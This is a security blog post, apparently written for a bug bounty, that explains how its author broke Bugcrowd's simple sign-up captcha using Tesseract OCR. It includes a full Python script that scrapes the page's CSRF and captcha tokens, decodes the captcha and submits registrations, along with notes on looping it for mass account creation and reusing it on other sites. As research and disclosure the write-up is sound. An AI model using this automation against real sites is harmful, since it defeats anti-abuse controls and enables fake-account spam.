Thursday, 5 December 2013

Breaking Bugcrowd's Captcha with Python and Tesseract

In this post I'm going to talk about bypassing Bugcrowd's captcha using Python and Tesseract. This post was originally written for the Bugcrowd blog.

A Bugcrowd Bounty

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic captcha. In certain sections of the site, for example account sign-up, password reset and after multiple failed password attempts, you were required to enter the captcha to verify you were human:

This in theory would prevent the automated use of these functions. But if I could find a way to bypass the captcha I could potentially abuse these functions.

So how do you bypass a captcha? 

If it's a home-grown captcha you may be lucky enough to find a logic flaw such as the captcha code being included on the current page or perhaps you can re-use a valid captcha more than once.

If you're dealing with a more sophisticated captcha you've got two options. Either you outsource the work to a developing country or you can try optical character recognition (OCR).


Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and return a list of characters. I found Tesseract to be a good choice as its engine has been pre-trained and it worked out of the box with decent results.
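
To give a rough idea of what driving Tesseract from Python can look like, here is a minimal sketch. It assumes the tesseract binary is on your PATH, and the helper names (build_tesseract_command, clean_ocr_text, read_captcha) are placeholders I made up for illustration. Note that Tesseract 3.x spells the page segmentation option -psm, while 4.x and later use --psm.

```python
import subprocess


def build_tesseract_command(image_path, output_base, legacy_flags=True):
    """Build the argument list for a single-word OCR run.

    Assumes a "tesseract" executable on PATH (an assumption, adjust as needed).
    """
    # Tesseract 3.x uses "-psm"; 4.x and later use "--psm".
    psm_flag = "-psm" if legacy_flags else "--psm"
    # Page segmentation mode 8 treats the image as a single word.
    return ["tesseract", image_path, output_base, psm_flag, "8"]


def clean_ocr_text(raw_text):
    """Keep the first line of the OCR output and drop all whitespace in it."""
    first_line = raw_text.split("\n")[0]
    return "".join(first_line.split())


def read_captcha(image_path, output_base="output"):
    """Run Tesseract and return the cleaned text it wrote to <output_base>.txt."""
    subprocess.check_call(build_tesseract_command(image_path, output_base))
    with open(output_base + ".txt", "r") as handle:
        return clean_ocr_text(handle.read())
```

Calling read_captcha("captcha2.png") would run the OCR and return the first line of text with whitespace removed. How accurate that text is depends entirely on the image you feed in.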

As the Bugcrowd captcha was so simple, all I needed to do was enlarge the image before submitting it to Tesseract for the analysis to succeed most of the time. For other, more complex captchas that use distorted characters or overlays to mask the text, you will need to clean the image before submitting it to Tesseract. Some examples can be found in the references below.
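
As a rough illustration of what "cleaning" can mean, here is a small sketch of two common steps: thresholding to pure black and white, then removing isolated specks. I didn't need this for Bugcrowd's captcha, so treat it as an assumption about what a noisier captcha might require. To keep it dependency-free it works on a plain list of rows of grayscale values (0 to 255) rather than a PIL image, and the function names are my own.

```python
def binarize(pixels, threshold=128):
    """Map each grayscale value to pure black (0) or pure white (255)."""
    return [[0 if value < threshold else 255 for value in row] for row in pixels]


def remove_specks(pixels):
    """Turn a black pixel white when none of its four direct neighbours is black."""
    height = len(pixels)
    width = len(pixels[0]) if height else 0
    cleaned = [row[:] for row in pixels]
    for y in range(height):
        for x in range(width):
            if pixels[y][x] != 0:
                continue
            neighbours = [(y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)]
            has_black_neighbour = any(
                0 <= ny < height and 0 <= nx < width and pixels[ny][nx] == 0
                for ny, nx in neighbours
            )
            if not has_black_neighbour:
                cleaned[y][x] = 255
    return cleaned


# Tiny made-up image: a three-pixel dark stroke plus one stray dark pixel.
sample = [
    [250, 240, 30, 245],
    [245, 20, 25, 250],
    [240, 235, 245, 10],
]
cleaned = remove_specks(binarize(sample))
for row in cleaned:
    print(row)
```

The stroke survives because its pixels touch each other, while the stray pixel in the bottom-right corner has no dark neighbour and is wiped. Real captchas usually need tuning of the threshold and a smarter noise filter.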

Weaponizing using Python

With a way to obtain the captcha value from the captcha image I decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy I am, I had a look on Google to see if someone else had already created a similar script and although there were captcha breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests: one to retrieve the sign-up page (containing the captcha and csrf tokens) and a second to send the sign-up data (username, email, password etc.). To automate the whole process the script would need to download a copy of the sign-up page, extract the csrf and captcha tokens, download and analyse the captcha, then submit a sign-up request containing the form fields along with the csrf token, the captcha token and the decoded captcha value.

Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha
# Created by @pwndizzle - 

from PIL import Image
from urllib.error import URLError
from urllib.request import Request, urlopen, urlretrieve
from urllib.parse import urlencode
import re
import subprocess

def getpage():
    try:
        print("[+] Downloading Page")
        site = urlopen("")
        site_html = site.read().decode("utf-8")
        global csrf
        # Parse page for CSRF token (string 43 characters long ending with =)
        csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)
        print("-----CSRF Token: " + csrf[0])
        global ctoken
        # Parse page for captcha token (string 40 characters long)
        ctoken = re.findall('[a-z0-9]{40}', site_html)
        print("-----Captcha Token: " + ctoken[0])
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")

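def getcaptcha():
    try:
        print("[+] Downloading Captcha")
        captchaurl = "" + ctoken[0]
        # Save the captcha image locally so resizer() can open it
        urlretrieve(captchaurl, "captcha1.png")
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")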

def resizer():
    print("[+] Resizing...")
    im1 = Image.open("captcha1.png")
    width, height = im1.size
    # Enlarge the image five times in each direction to help Tesseract
    im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)
    im2.save("captcha2.png")

def tesseract():
    try:
        print("[+] Running Tesseract...")
        # Run Tesseract; -psm 8 tells Tesseract we are looking for a single word
        subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
        global cvalue
        # Remove whitespace and newlines from Tesseract output
        with open("C:\\Python33\\output.txt", "r") as f:
            cvaluelines = f.read().replace(" ", "").split('\n')
        cvalue = cvaluelines[0]
        print("-----Captcha: " + cvalue)
    except Exception as e:
        print("Error: " + str(e))

def send():
    try:
        print("[+] Sending request...")
        user = "testuser99"
        # urlencode() percent-encodes the check mark to %E2%9C%93 for us
        params = {'utf8':'\u2713', 'authenticity_token': csrf[0], 'user[username]':user, 'user[email]':user+'', 'user[password]':'password123', 'user[password_confirmation]':'password123', 'captcha':cvalue,'captcha_key':ctoken[0],'agree_terms_conditions':'true'}
        data = urlencode(params).encode('utf-8')
        request = Request("")
        # Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        # Check for error message
        fail = re.search('The following errors occurred', response)
        if fail:
            print("-----Account creation failed!")
        else:
            print("-----Account created!")
    except Exception as e:
        print("Error: " + str(e))

print("[+] Start!")
# Download page and parse data
getpage()
# Download captcha image
getcaptcha()
# Resize captcha image
resizer()
# Need more filtering? Add subroutines here!
# Use Tesseract to analyse captcha image
tesseract()
# Send request to site containing form data and captcha
send()
print("[+] Finished!")
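
If you want to try the token parsing on its own, without touching a live site, the two regular expressions from getpage() can be exercised against a fake page. This is only a sketch: the markup and both token values below are invented for the example, and extract_tokens is a helper name I made up.

```python
import re

# Same patterns as in getpage(): a 43-character base64-style string ending
# in "=" for the CSRF token, and a 40-character lowercase string for the
# captcha token.
CSRF_PATTERN = re.compile(r"[a-zA-Z0-9+/]{43}=")
CAPTCHA_PATTERN = re.compile(r"[a-z0-9]{40}")


def extract_tokens(page_html):
    """Return (csrf_token, captcha_token) or raise ValueError if either is missing."""
    csrf_match = CSRF_PATTERN.search(page_html)
    captcha_match = CAPTCHA_PATTERN.search(page_html)
    if csrf_match is None or captcha_match is None:
        raise ValueError("could not find both tokens in the page")
    return csrf_match.group(0), captcha_match.group(0)


# Made-up tokens and markup, only here to exercise the patterns.
fake_csrf = "Ab1+" * 10 + "Cd/="
fake_captcha = "0123456789abcdef" * 2 + "01234567"
sample_html = (
    '<meta content="' + fake_csrf + '" name="csrf-token" />\n'
    '<input name="captcha_key" type="hidden" value="' + fake_captcha + '" />'
)

csrf_token, captcha_token = extract_tokens(sample_html)
print("CSRF token:    " + csrf_token)
print("Captcha token: " + captcha_token)
```

Matching on length and character set alone is fragile, since any other 40-character lowercase string on the page would match first. For a different site you would probably want to anchor the patterns to the surrounding field names or use an HTML parser.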

Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following captcha:

I get the following output:

Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking "if it's that easy to bypass a captcha why isn't everyone doing it?". Well there are some important points to remember:

  • Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.
  • Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha means a lower success rate, more requests and a greater chance of getting caught/locked out.
  • There could be server-side mitigations in place we don't know about, e.g. each IP cannot create more than five accounts a day.
  • The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.
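
To put the 30% figure in perspective, here is a quick back-of-the-envelope calculation. It assumes each attempt succeeds independently with the same probability (my simplification, real captchas may not behave that way), in which case the average number of attempts per account is 1 divided by the success rate. It also assumes three requests per attempt, matching the script's page download, captcha download and form post.

```python
def expected_attempts(success_rate):
    """Average attempts needed for one success, assuming independent tries."""
    if not 0 < success_rate <= 1:
        raise ValueError("success_rate must be in the range (0, 1]")
    return 1 / success_rate


def expected_requests(accounts, success_rate, requests_per_attempt=3):
    """Average number of HTTP requests needed to create the given number of accounts."""
    return accounts * requests_per_attempt * expected_attempts(success_rate)


print("Attempts per account: {:.1f}".format(expected_attempts(0.3)))
print("Requests for 100 accounts: {:.0f}".format(expected_requests(100, 0.3)))
```

So at a 30% success rate you would expect a little over three attempts per account, and roughly a thousand requests to create a hundred accounts. Drop the success rate to a few percent on a harder captcha and the request count climbs quickly, which is exactly when rate limiting and lockouts start to bite.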

Final Thoughts

I like the concept of captchas: current machines struggle with optical recognition, and an image check is all it takes to prevent automation. As demonstrated, though, simple letter/number captchas can be easy to break and everyday use can frustrate users. For me, images of people/objects/scenes, like the friend captcha used by Facebook, or interactive captchas/mini-games appear to be interesting alternatives that offer effective anti-automation (for now) with an improved user experience.

If you want to re-use the script it should work fine on other machines and sites, but you'll need to change the URLs and the parsing logic, and possibly apply image filters depending on the captcha you're targeting. I built the script using Python 3.3 and Tesseract 3.02 with default installation locations on Windows 7.

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

Also, cleaning captchas with ImageMagick looked interesting but I didn't get round to testing it:

Thanks to Bugcrowd for all their awesome work. I hope you guys have found this post useful. Questions and feedback are always appreciated so drop me a comment below :)

Pwndizzle out.


  1. Hi, excellent post.
    But I don't understand how you know the parameters like the csrf authenticity_token and captcha_key. How can I obtain them?
    Thank you
